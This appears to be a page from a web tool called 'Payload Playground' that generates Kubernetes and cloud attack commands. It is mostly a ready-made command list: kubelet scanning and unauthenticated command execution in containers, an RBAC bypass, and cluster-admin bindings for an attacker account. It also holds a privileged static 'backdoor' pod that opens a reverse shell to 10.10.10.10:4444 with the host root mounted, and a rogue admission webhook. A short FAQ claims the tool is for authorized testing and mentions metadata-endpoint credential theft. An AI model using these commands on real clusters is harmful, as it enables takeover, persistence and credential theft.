Skip to content
Payload Playground
$loading...
# ── Port scan for kubelet API (10250 = authenticated, 10255 = unauthenticated) ──
nmap -p 10250,10255 <node-ip>

# ── Unauthenticated kubelet (port 10255) ──────────────
curl -sk http://<node-ip>:10255/pods | jq '.items[].metadata.name'
curl -sk http://<node-ip>:10255/runningpods | jq .

# ── Authenticated kubelet API (10250) ─────────────────
# Requires client cert or token — try with service account token:
curl -sk -H "Authorization: Bearer $TOKEN" https://<node-ip>:10250/pods

# ── List all pods on the node ─────────────────────────
curl -sk https://<node-ip>:10250/pods

# ── Execute command in a running container ────────────
curl -sk -X POST https://<node-ip>:10250/run/<namespace>/<pod>/<container> \
  -d "cmd=id"

# ── Stream container logs ──────────────────────────────
curl -sk https://<node-ip>:10250/containerLogs/<namespace>/<pod>/<container>

# ── Run command without RBAC checks (bypass API server) ──
curl -sk -X POST https://<node-ip>:10250/exec/<namespace>/<pod>/<container>?command=bash&command=-i&stdin=true&stdout=true&stderr=true&tty=true
# ── Create ClusterRoleBinding for attacker account ───
kubectl create clusterrolebinding attacker-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=default:my-service-account

# ── Grant cluster-admin to any user ──────────────────
kubectl create clusterrolebinding attacker-admin \
  --clusterrole=cluster-admin \
  [email protected]

# ── Persistence: static pod on master node ────────────
# Write to /etc/kubernetes/manifests/ on master:
cat <<'EOF' > /etc/kubernetes/manifests/backdoor.yaml
apiVersion: v1
kind: Pod
metadata:
  name: backdoor
  namespace: kube-system
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: backdoor
    image: ubuntu:latest
    command: ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF

# ── Modify admission controller webhook for persistence ──
kubectl get validatingwebhookconfigurations
kubectl get mutatingwebhookconfigurations

# ── Create rogue admission webhook ────────────────────
cat <<'EOF' | kubectl apply -f -
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: backdoor-webhook
webhooks:
- name: backdoor.10.10.10.10.nip.io
  clientConfig:
    url: "https://10.10.10.10:8443/mutate"
  rules:
  - apiGroups: [""]
    apiVersions: ["v1"]
    operations: ["CREATE"]
    resources: ["pods"]
  admissionReviewVersions: ["v1"]
  sideEffects: None
EOF

Frequently Asked Questions

What is a cloud infrastructure exploitation payload?+

It is a command or manifest that abuses misconfigured cloud or container controls after initial access, such as a Kubernetes RBAC escalation, a container breakout, or an IAM privilege-escalation chain. The Cloud Infrastructure generator outputs kubectl, aws, gcloud, and az commands for authorized post-compromise testing.

How do I escalate privileges through an over-permissive IAM role?+

Use the generator to chain dangerous permissions, for example AWS iam:PassRole with lambda:CreateFunction, or sts:AssumeRole into a more privileged role. On GCP it produces iam.serviceAccounts.getAccessToken abuse and on Azure it builds Contributor-to-Owner role-assignment paths that scanners like pacu and ScoutSuite confirm.

How does a container escape or Kubernetes RBAC abuse actually work?+

A privileged or hostPath-mounted pod lets you write to the node filesystem or access the Docker socket to break out onto the host. RBAC abuse exploits verbs like create pods/exec or escalate on roles, and the generator can also hit the cloud metadata endpoint at 169.254.169.254 to steal the node's instance credentials.

Does the Cloud Infrastructure generator run in my browser?+

Yes, it is free and executes entirely client-side, so account IDs, ARNs, cluster names, and commands never leave your device. It is intended only for cloud accounts and clusters you own or are authorized to assess.

Cloud Infrastructure Attack Generator — K8s, Container Escape & IAM PrivEsc | Payload Playground